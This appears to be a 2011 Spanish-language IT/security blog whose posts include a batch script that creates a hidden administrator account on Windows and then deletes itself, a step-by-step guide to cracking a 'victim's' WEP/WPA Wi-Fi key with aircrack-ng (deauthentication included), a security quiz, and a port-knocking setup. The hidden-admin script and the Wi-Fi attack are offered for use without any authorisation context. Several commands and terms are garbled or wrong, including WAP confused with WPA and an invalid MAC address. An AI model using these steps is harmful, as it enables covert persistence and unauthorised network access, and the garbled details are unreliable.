sábado, 26 de noviembre de 2011

Como crear un cuenta invisible en windows

Muchas veces cuando intentamos crear una cuenta en cualquier S.O. Windows (ya sea personal o temporal dependiendo el equipo donde se aloje) lo ideal es pasar desapercibidos ante cualquier otro usuario, pero Wow! ¿Qué rayos sucede cuando creamos nuestra cuenta e intentamos iniciar sesión..? Si señor… esa es la respuesta… se puede observar la cuenta recién creada como una de las opcionadas para loguearse… Bueno aquí se hará una pequeña referencia de algunos comandos importantes para hacer toda la operación, desde crear el usuario hasta ocultarlo simplemente con 3 lineas de código en un archivo BATCH (.BAT)

Justificación

- La idea es dejar de usar el sistema de ventanas X window y pasar a otro paralelo de uso comandos desde la consola – prompt. También conocer ciertos comandos que pueden ser muy útiles cuando se manejan los parámetros adecuados.

En la practica

1. Creando nuestro usuario

- Para crear nuestro usuario se debe tener presente que debemos tener una cuenta de root [Administrador] o usuario avanzado… Para crear una cuenta desde la consola es tan simple como ingresar el comando net user.. con la siguiente estructura.

1 net user usuario clave /Add

* La clave es opcional. si no se ingresa queda en blanco cuando se inicie sesion

2. Adicionando nuestro usuario a un grupo

- El siguiente paso después de crear nuestro usuario es adicionarlo a un grupo, ya que por defecto queda como invitado/usuario normal. Para poder realizar esta operación desde la consola, simplemente debemos usar el comando net localgroup el cual contiene el listado de los grupos del sistema [influye el idioma del SO] y permite realizar tareas con un usuario en especial en este caso sera el usuario que hayamos creado.

*Esta es la salida que retornaría nuestro comando normalmente

C:\Documents and Settings\cocoman>net localgroup
Aliases for \\cocoman
------------------------------------------------
*Administrators
*Backup Operators
*Guests
*HelpServicesGroup
*Network Configuration Operators
*Power Users
*Remote Desktop Users
*Replicator
*Users
The command completed successfully.


net localgroup administradores usuario /Add

*En este ejemplo mi usuario quedó en el grupo de administradores (El idioma del Sistema operativo para este caso es español.)

*Se debe tener en cuenta que para hacer este cambio, debemos tener también privilegio de administrador.

3. Volviendo a nuestro usuario invisible, ahora sí

- Esta parte se maneja a través del regedit (Editor del registro de Windows) modificando la siguiente clave.


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList

y adicionando el usuario a volver invisible, pero para que llamar al regedit si podemos hacerlo todo desde nuestra consola.

Bueno solo con teclear lo siguiente, nuestro usuario quedará invisible en el inicio de sesión.


reg add "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Usuario /t REG_DWORD /d 0

Aquí hemos creado una clave con valor DWORD y le hemos asignado el valor cero, el cual da la propiedad de invisibilidad en el inicio de sesion…

La parte final

Bueno pues como lo prometido es deuda ahora este es código que nos permitira en resumidas lineas hacer todo lo que se explicaba durante este pequeño lab.

Funcionamiento :

1. En una consola de DOS invoca/llama/Ejecuta al bat esperando 2 parámetros.
1.1 El primero corresponde al nombre de usuario que será creado en el sistema
1.2 El segundo corresponde a la clave que tendra el usuario para iniciar sesión
2. Listo ahora solo es probar.



@Echo off
rem * Nota: Recomedable llamar al archivo user.bat para eliminarlo automaticamente antes de que
rem * se apague el pc.
rem * Este Bat funciona a partir de dos parametros.
rem * 1. define el nombre de usuario con el cual quedara registrado en el sistema.
rem * 2. define la clave de inicio de sesion para el usuario
rem * Aqui creamos nuestro usuario partiendo de los parametros asignados al momento de invovar el bat
@net user %1 %2 /add
rem * Aqui agrego al usuario al grupo de admnistradores de la maquina. Se debe tener en cuenta el idioma de windows
rem * ya que en las versiones en ingles el nombre cambia por administrators
@net localgroup administradores %1 /add
rem * Agrego mi usuario asignandole la ruta en el regedit que contiene las cuentas especiales y creo un nuevo valor
rem * de tipo DWORD con valor 0, para asignarle la propiedad e invisibiidad..
@reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %1 /t REG_DWORD /d 0
rem * Listo ahora todo sera consumado :P
rem * cierro mi sesion
shutdown -l
del user.bat

¿Ahora como inicio sesión con mi usuario?

* Para poder seleccionar al usuario que hemos creado simplemente pulsando la combinación de teclas [CTRL + ALT + SUPR] en el inicio de sesión se abrirá una nueva ventana donde ingresaremos el nombre de usuario y la contraseña (si tiene contraseña).

PTA: Cualquier duda referente de los comandos simplemente con colocar el comando en la consola y escribir a continuación /? aparecerá la descripción y funcionamiento de cada comando

PTA2: Como diría Adrian Lamo, cuando todo falla el manual tiene la solución… si quieren pueden consultar la ayuda de Windows con la descripción de cada comando, con referencias rápidas y ejemplos de su uso.

martes, 12 de julio de 2011

Tutorial de instalación, configuración y funcionamiento de una plataforma de correo en windows server 2008 (Exchange)

Manual de instalación y configuracion de Exchange en Windows Server 2008

sábado, 9 de julio de 2011

Tutorial de instalación, configuración y funcionamiento de un servidor de actualizaciones (WSUS) en Windows 2008 Server Enterprise

Servidor de Actualizaciones Wsus

miércoles, 29 de junio de 2011

Tutorial de instalacion y configuracion de servicios de Implementación de Windows (WDS)

Servicios de Implementación de Windows (WDS)

jueves, 23 de junio de 2011

Cuestionario de seguridad

Continuando con el Test de seguridad les comparto 100 preguntas relacionadas con el tema de la seguridad de la información. Lo que básicamente realizo aquí es tratar de aborda los SGSI teniendo en cuenta característica como estándares, certificaciones , análisis de amenazas y vulneravilidades entre otros.

1.¿En que se basa la seguridad de la información?
2.¿Para que las empresas tienen expertos en seguridad informática?
3.¿Por qué es tan importante preservar la información?
4.¿Cuáles son los factores de riesgos a los que se expone la información?
5.¿Qué tipo de información es más vulnerables en las empresas?
6.¿Cuáles son las clases de delitos más frecuentes respecto a la seguridad de la información?
7.¿Cómo se ven afectadas las compañías en materia de Seguridad de la Información?
8.¿Qué permiten los servicios de seguridad de la información?
9.¿en que afectan los virus informáticos la seguridad de la información?
10.¿Cuáles son los estándares de la seguridad de la información?
11.¿Cuáles son las certificaciones que se realizan en cuanto a la seguridad de la información?
12.¿Qué es un balanceador de carga?
13.¿Qué es un esquema SSHA?
14.¿Cuáles son los cincos pasos para mantenerse protegido?
15.¿Cuáles son los retos que presenta una empresa?
16.¿Cuáles son los beneficios de implementar el estándar ISO 27001?
17.¿Qué criterios debe  Definir una empresa según la ISO 27001 para tener un  enfoque de evaluación de riesgos?
18.¿Qué aspectos se tienen en cuenta según la ISO 27001 para diseñar SGSI?
19.¿Cuál es la diferencia entre acciones preventivas y correctivas en políticas de seguridad de la información?
20.La seguridad de la información es considerada:
21.La certificación de un SGSI es un proceso mediante el cual:
22.¿Qué aspectos hacen parte de La ISO/IEC 27001 de "Plan-Do-Check-Act" (PDCA)?
23.¿Que otro sistema hace parte SGSI según la ISO?
24.En sistemas de SGSI la seguridad lógica se refiere a:
25.¿Cuáles de la siguientes opciones no hace parte de  los  principales objetivos que persigue la seguridad lógica son?
26.¿Cuál de estos niveles pertenece a los niveles de la seguridad lógica?
27.¿Cuales es uno de los principales problemas en una empresa en caso de que una información confidencial sea revelada?
28.El termino confidencialidad se refiere a:
29.¿Porque es importantes la disponibilidad de un servicio?
30.¿Que parámetro no cubre el nivel de seguridad D en sistemas de seguridad de la información?
31.¿Cuáles son los criterios mínimos que se deben cumplir en una clase Nivel C1?
32.Los daños que afectan en data-center, son en su mayoría:
33.¿Cuál es el activo más importante que se posee una entidad?
34.¿Cuál es el principal objetivo de la seguridad lógica?
35.Constituyen una importante ayuda para proteger al sistema operativo de la red, al sistema de aplicación y demás software de la utilización o modificaciones no autorizadas.
36.Donde se deben aplicar los controles de  acceso para mejorar la seguridad
37.Son estándares de seguridad del National Institute for Standars and Technology (NIST) que se refieren a los requisitos mínimos de seguridad en cualquier sistema.
38.Son modalidades de acceso que se permite al usuario sobre los recursos y a la información.
39.¿En cuantos subniveles se divide el nivel B de seguridad.
40.¿Es posible controlar el acceso a la información por medio de los roles que se desempeñen?.
41.¿El nivel B1 de  seguridad etiquetadaSoporta seguridad multinivel, como la secreta y ultra secreta
42.Es el nivel más elevado, incluye un proceso de diseño, control y verificación, mediante métodos formales (matemáticos) para asegurar todos los procesos que realiza un usuario sobre el sistema.
43.¿Cuál de estos niveles son necesarios para poder aplicar el nivel A (Protección Verificada)
44.¿Cuál es una de las medidas de seguridad física que debe tener en cuenta una empresa para evitar la pérdida de información clave por accidentes (natural o humano)
45.¿Para completar el círculo de seguridad es necesario colocar los Backups.
46.¿Como se puede clasificar la información en un análisis de riesgo
47.¿Las amenazas a la información normalmente se distribuyen en 3 grupos cuáles son
48.¿Que tipos de activos de información hay en una empresa
49.¿Que tan necesario es tomar de medidas de proteccion adecuadas?
50.¿Que es la seguridad informática?
51.¿Que propósito tiene las políticas de seguridad?
52.¿Que es un elemento de información?
53.¿Que procesos debe mantenerse constantemente?
54.¿Cuáles son los aspectos principales de seguridad?

55.¿Cuál es el primer paso en la gestión de riesgo?
56.¿Qué objetivo tiene la seguridad de la información?
57.¿Cuál es el objetivo de la protección de datos?
58.¿En que están basado todo el proceso de gestión del riesgo
59.¿Porqué en una empresa el tema de seguridad de la información no recibiría la atención adecuada
60.¿Cuáles son las fases que contiene el método de gestión de riesgo?
61.¿Para proteger los dispositivos físicos de ataques se implementan 3 modalidades de servidores proxy
62.¿Cual es una de las principales ventajas de los servidores proxy en la seguridad de la información.
63.¿Que característica representa una de las principales ventajas para los servidores proxy?
64.¿Cuáles de estas bases de datos representa mayor vulnerabilidades de amenazas de la información.
65.En análisis de las vulnerabilidades de las bases de datos ¿Que es Directivas de seguridad?
66.¿Cuál es la mejor forma de prevenir las vulnerabilidades en las bases de datos.
67.¿Cuales son una de las principales amenazas y vulnerabilidades de la autenticación de los usuarios.
68.¿Qué características tiene las amenazas y vulnerabilidades de acceso de los datos.
69.Inyección SQL es considerado como:
70.Los activos pueden agruparse en las siguientes categorías:
71.En el campo de la seguridad informática, ingeniería social es:
72.Un agujero de seguridad es:
73.Las fallas y fuentes de publicación de las vulnerabilidades que condiciones tiene la información revelada en estas:
74.Se habla de vulnerabilidad remotas cuando:
75.Los agujeros y vulnerabilidad de seguridad más conocidos son:
76.¿Qué medidas serían la más adecuadas de cara a minimizar el ataque por virus en nuestra empresa?
77.En criptografía a que se le denomina ataque de fuerza bruta:
78.Los puertos más comúnmente vulnerables de ataque son:
79.En que capa del modelo OSI funcionan los firewall  de filtrado de paquetes
80.Unas de las principales desventajas de firewall frente a los ataque a la información son:
81.Las políticas básicas en la configuración de un firewall son selecciono 2 respuestas correctas:
82.¿A que se le denomina HONEYPOT?

83.¿Que es disponibilidad?
84.¿Cuál es el primer paso en la Gestión de riesgo?
85.¿Cuál es el objetivo de clasificar un riesgo?
86.¿Que son los protocolos de seguridad?
87.¿Cómo debe ser una infraestructura para ser segura?
88.¿Qué medidas de seguridad se pueden tomar en una empresa internamente?
89.¿Qué medidas deben implementar los usuarios para proteger su información?
90.¿Qué medidas externas puede tomar una empresa con respecto a su seguridad?
91¿Cuál es el SO más  seguro?
92.¿A cuál es el SO al que le han encontrado más vulnerabilidades?
93.¿Si fueras a realizar un ataque de fuerza bruta que SO usarías?
94.¿Una empresa que SO usaría para los usuarios finales?
95.¿Que implica considerar aspectos de seguridad de la información?

96.¿En cuanto a entorno grafico cual es el SO más avanzado
97.¿Linux es uno de los términos empleados para referirse a la combinación del núcleo o kernel libre similar a Unix denominado Linux
98.De los siguientes sistemas operativos cual es considerado más estable y seguro para  servidores:
99.¿De los siguientes medio de transmisión cual es considerado el más seguro?
100.¿Una de las principales ventajas de seguridad en IPV6 frente a IPV4 es?
.1.   

Test de seguridad

Este test tiene como finalidad medir conocimientos en el área de la seguridad de la infomación, consta basicamente de 10 preguntas que usted debe resolver en el menor tiempo posible, se encuentra en el siguiente link.


lunes, 13 de junio de 2011

Tutorial de proxy squid en linux

Servidor Proxy Squid

Tutorial de instalacion y configuracion de ccproxy en Windows Server 2008

Tutorial de Instalacion y Configuracion de Ccproxy en Windows Server 2k8

viernes, 27 de mayo de 2011

Como romper claves con protocolo de seguridad wap y wep de una red inalambrica

Introducción 

Vamos a empezar ésta práctica haciendo una pequeña introducción y definición de los componentes referentes a esta entrada como son las redes inalambricas, que es un protocolo de seguridad (Lo mas comunues wap, wep) y como se haria el rompimiento de una clave con estos protocolos a traves de la Herramienta Backtrack (Que es una distribución de seguridad del Sistemas Operativo Linux) con la aplicación Aircrack-ng y seguidamente procederemos a la implementación de esta práctica

Que es una red inalambrica

(Wireless network). En general, cualquier tipo de red que es inalámbrica. Pero el término suele utilizarse más para referirse a aquellas redes de telecomunicaciones en donde la interconexión entre nodos es implementada sin utilizar cables.
Las redes inalámbricas de telecomunicaciones son generalmente implementadas con algún tipo de sistema de transmisión de información que usa ondas electromagnéticas, como las ondas de radio. La principal ventaja de las redes inalámbricas es que se eliminan metros y metros de cables, pero su seguridad debe ser más robusta.

Fuente: http://www.alegsa.com.ar/Dic/red%20inalambrica.php

WEP, acrónimo de Wired Equivalent Privacy o "Privacidad Equivalente a Cableado", es el sistema de cifrado incluido en el estándar IEEE 802.11 como protocolo para redes Wireless que permite cifrar la información que se transmite.


WAP, son las siglas de Wireless Application Protocol (protocolo de aplicaciones inalámbricas), un estándar seguro que permite que los usuarios accedan a información de forma instantánea a ravés de dispositivos inalámbricos como PDAs, teléfonos móviles, buscas, walkie-talkies y teléfonos inteligentes (smartphones). El estándar WAP soporta la mayoría de las redes inalámbricas, incluyendo CDPD, CDMA, GSM, PDC, PHS, TDMA, iDEN, TETRA, DECT, DataTAC y Mobitex y es soportado por todos los sistemas operativos. 

Fuente: es.wikipedia.org/wiki/WAP

Que es Aircrack-ng

Aircrack-ng es un programa crackeador de claves 802.11 WEP y WPA/WPA2-PSK. Aircrack-ng puede recuperar la clave WEP una vez que se han capturado suficientes paquetes encriptados con airodump-ng. Este programa de la suite aircrack-ng lleva a cabo varios tipos de ataques para descubrir la clave WEP con pequeñas cantidades de paquetes capturados, combinando ataques estadísticos con ataques de fuerza bruta. Para crackear claves WPA/WPA2-PSK, es necesario usar un diccionario.  

Como Funciona

Múltiples técnicas se combinan para crackear la clave WEP:

  • Ataques FMS ( Fluhrer, Mantin, Shamir) - son técnicas estadísticas
  • Ataques Korek - tambien técnicas estadísticas
  • Fuerza bruta

Cuando se usan técnicas estadísticas para crackear claves WEP, cada byte de la clave es tratado de forma individual. Usando matemáticas estadísticas, la posibilidad de que encuentres un byte determinado de la clave crece algo más de un 15% cuando se captura el vector de inicialización (IV) correcto para ese byte de la clave. Esencialmente, ciertos IVs “revelan” algún byte de la clave WEP. Esto es básicamente en que consisten las técnicas estadísticas. 

Fuente: http://www.aircrack-ng.org/doku.php?id=es:aircrack-ng

Implementación de la práctica

Aircrack-ng (Descifra la Clave de los vectores de inicio)
Airodump-ng (Escanea las redes y captura vectores de inicio)
Aireplay-ng (Inyecta tráfico para elevar la captura de vectores de Inicio)
Airmon-ng (Logra poner la tarjeta inalámbrica en modo Monitor, para poder capturar e inyectar vectores)
La suite está diseñada para trabajar con una distribución Linux, aunque también existe una versión para Windows que no es muy estable debido a conflictos con drivers.
Esta suite está diseñada para trabajar con tarjetas inalámbricas cuyo chip es Atheros y con algunas de chip Railink sin necesidad de configurarlas. Aunque se ha logrado usar la suite en otros chips, con configuraciones especiales en Linux.
Para hacer esta practica podemos utilizar todas las ditribuciones linux como son:
Back track , que tiene aircrag por defecto, como son 
ubuntu, debian, centos, en estos si es necesario instalar el paquete del aircrack

Fuente: http://es.wikipedia.org/wiki/Aircrack-ng

Ponemos nuestra tarjeta inalambrica wi-fi en modo monitor, esto sirve para capturar el trafico de la red wi-fi con la que haremos el ataque, miramos nuestra interfaz que este en modo managed (mon0) copiamos la mac por que mas tarde la necesitamos para pegarla.

Colocamos nuestra tarjeta en modo monitor

(airmong-ng start wlan0)

Procedemos apagar nuestra interfaz de escucha

Iwconfig wlan0 down
Iwconfig wlan0 mode monitor

Subimos la interfaz de nuevo

Ifconfig wlan0 up

Verificamos que cargue el modo monitor (mono), pasamos de modo managed a modo monitor (mon0)

Iwconfig wlan0 

Procedemos a buscar la victima y la interfaz en la que estamos en nuestro caso la wlan0

 airodump-nf wlan0 
Con este comando escaneamos para que nos muestre las redes disponibles

Procedemos a capturar el trafico de nuestra victima lo que haremos sera correr el airodump-ng -bssid (Mac de nuestra victima) -c (canal en que se encuentran la victima) -w (Nombramos el archivo donde estara guardado todos los datos) Wlan0 (la interfaz)


airodump-ng --bssid 08:00:27:g6:7f:8i -c1 daniel wlan0


Debemos entonces esperar a que capture los suficientes paquetes


Abrimos otra terminal para el ataque de aireplay para decifrar la wi-fi de la victima


aireplay-ng -0 30 -a (Mac de la victima) -h (Nuestra propia mac) wlan0

 
Cuando tengamos los suficientes paquetes lo recomendable son unos 200000 corremos el aircrack-ng para cifrar la contraseña

aircrack-ng (Nombre donde se guardan los datos, en mi caso daniel.cap) aircrack-ng daniel.cap


Ya por ultimo podremos obsevar la clave, en algunos casos aparece la contraseña cifrada o en texto plano, pero igual si la ponemos cifrada tambien la reconoce reconoce.



 








jueves, 26 de mayo de 2011

Configuracion de Windows Server 2008 Enterprise como un Router

Tutorial de Configuracion de Windows Server Como Router

domingo, 22 de mayo de 2011

Port Knocking (Golpeo o toque de puertos)

En redes de computadores, se refiere al golpeo de puertos es un método para abrir externamente los puertos en un servidor de seguridad mediante la generación de un intento de conexión en un conjunto de pre-especificados los puertos cerrados. Una vez que la secuencia correcta de los intentos de conexión se recibe, las reglas del firewall son modificadas dinámicamente para permitir al host que envió a los intentos de conexión para conectar a través del puerto específico (s). Una variante denominada Single Packet Autorización existe, donde un solo 'golpe' que se necesita, que consiste en un cifrado de paquetes.
Esto se implementa normalmente mediante la configuración de un demonio para ver el archivo de registro de servidor de seguridad para dichos intentos de conexión a continuación, modifique la configuración del cortafuego en consecuencia. También se puede realizar mediante un proceso de examen de los paquetes en un nivel superior (con interfaces de captura de paquetes, tales como pcap), permitiendo el uso de los ya "abrir" los puertos TCP a utilizar dentro de la secuencia de golpes.
 La complejidad de los golpes pueden ser desde una simple lista ordenada (por ejemplo, el puerto TCP 1000, el puerto TCP 2000, el puerto UDP 3000) a un complejo que depende del tiempo, hash cifrado de código basado en IP y otros factores de base.
Un demonio portknock en la máquina servidor de seguridad detecta paquetes en ciertos puertos (ya sea a través del registro de servidor de seguridad o por la captura de paquetes). El usuario del cliente que lleve consigo una utilidad adicional, que podría ser tan simple como netcat o un programa de ping modificado o tan complicado como un hash completo generador, y el uso que antes de que se trataba de conectarse a la máquina de la forma habitual

BENEFICIOS DEL GOLPEO DE PUERTO

Tenga en cuenta que, si un atacante externo no conocía la secuencia de golpeo de puertos, incluso el más simple de las secuencias que requieren un esfuerzo masivo de la fuerza bruta para ser descubierto. A tres golpes simples TCP secuencia (por ejemplo, el puerto 1000, 2000, 3000) se requiere que un atacante sin el conocimiento previo de la secuencia para poner a prueba todas las combinaciones de los tres puertos en el rango 1-65535, y luego de escanear cada puerto en el medio para ver si algo se había abierto. Como un sistema de estado, el puerto no se abrió hasta después de la secuencia correcta de tres dígitos se habían recibido en orden, sin otros paquetes en el medio.
Eso equivale a un máximo de 65536 3 paquetes con el fin de obtener y detectar una exitosa apertura única, en el peor de los casos escenario. Eso es 281.474.976.710.656 o más de 281 billones de paquetes. En promedio, un intento tomaría aproximadamente 9.2 trillones de paquetes para abrir con éxito una, sencillo de tres sólo dominó el puerto TCP solo por la fuerza bruta. Esto se hace aún más práctico cuando intento llamar limitante se utiliza para detener los ataques de fuerza bruta, más y más complejas secuencias se utilizan, y resúmenes criptográficos se utilizan como parte de los golpes.


ESQUEMA DE GOLPEO DE PUERTOS EN 4 SENCILLOS PASOS


 

el paso 1 (A) del cliente no puede conectarse a una aplicación escuchando en puerto n, (B) cliente no puede establecer la conexión a cualquier puerto

 

paso 2 | (1,2,3,4) cliente se conecta a un conjunto bien definido de los puertos en una secuencia que contiene un mensaje cifrado mediante el envío de paquetes SYN, el cliente tiene un conocimiento a priori de los golpes demonio de puerto y de su configuración, pero recibe ningún reconocimiento durante esta fase debido a las reglas del firewall se oponen a cualquier respuesta




paso 3 | (A) proceso de servidor (un golpe demonio de puerto) intercepta los intentos de conexión e interpreta (descifra y decodifica) como compuesto de un auténtico "golpe de puerto"; servidor lleva a cabo tareas específicas en función del contenido de golpeo de puertos, como la apertura del puerto n al cliente



paso 4 | (A) cliente se conecta al puerto n y la aplicación regular de mecanismo con autenticación

Estas imágenes fueron tomadas de http://www.portknocking.org/

Para la instalación del PORT KNOKING utilizaremos usaremos  sistema operativo DEBIAN como cliente del PORT KNOKING y atacaremos a un servidor con sistema operativo CENTOS con servidor  de DNS, DHCP ,SERVIDOR SSH, SAMBA ,FTP, APACHE.

1)    Instalaremos  EL PAQUETE del PORT KNOKIN de los repositorios oficiales con el siguiente comando.
         apt-get install knockd 

 

2)    Configuraremos el archivo
etc/default/knockd

 Habilitando el knockd (cambia el 0 por un 1) y configurando la interface de red por la cual escucharemos los “toques
 


El Knockd es el servidor, que se ejecutara en el ordenador que queremos que este escuchando  y ejecute los comandos en función de la secuencia que mandemos. Aquí hay algunas opciones de comando que se pueden ejecutar:

 -i, --interface <int> La interfaz en la que escuchara, por defecto eth0
 -d, --daemon Si lo queremos corres en modo demonio.
 -c, --config <file> El fichero de configuración, por defecto/etc/knock/.etc
-D, --debug Mensajes de debugging..
-v, --verbose Una salida con más información.
         -V, --versión Muestra la versión.
-h, --help Ayuda.


Una vez hecho esto, vamos a configurar nuestras reglas de Port Knocking editando el archivo/etc/knockd.conf, es bastante simple de configurar, solo debemos cambiar la secuencia de puertos (predecibles para el articulo, pero deberías escoger puertos por encima del 5000 que no estén muy cerca el uno del otro y un time out mas alto), el tiempo entre la conexión de cada uno, la bandera que utilizaran y el comando a ejecutar si todas las anteriores reglas se cumplen.

 

 

Guardamos la configuración anterior  y reiniciamos el servicio knockd:




Para conectarnos e intentar abrir los puertos ejecutamos el siguiente comando
Ahora corremos el knockd en el host en el que queremos ejecutar comandos: knockd -i eth0 -v.
Después ya solo falta utilizar el knock, es decir el llamador cuando queramos ejecutar algo. Desde el Cliente: 
 


# /usr/sbin/knock -v 192.168.1.5   16000 17000 18000

Para ejecutarlo desde el servidor ejecutamos el siguiente comando:

#./knockd -v
#running command: /sbin/iptables -I INPUT -s 192.168.1.3 -p tcp --dport 21 -j ACCPET

Referencia: CIBERGRAFIAS



 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Grants For Single Moms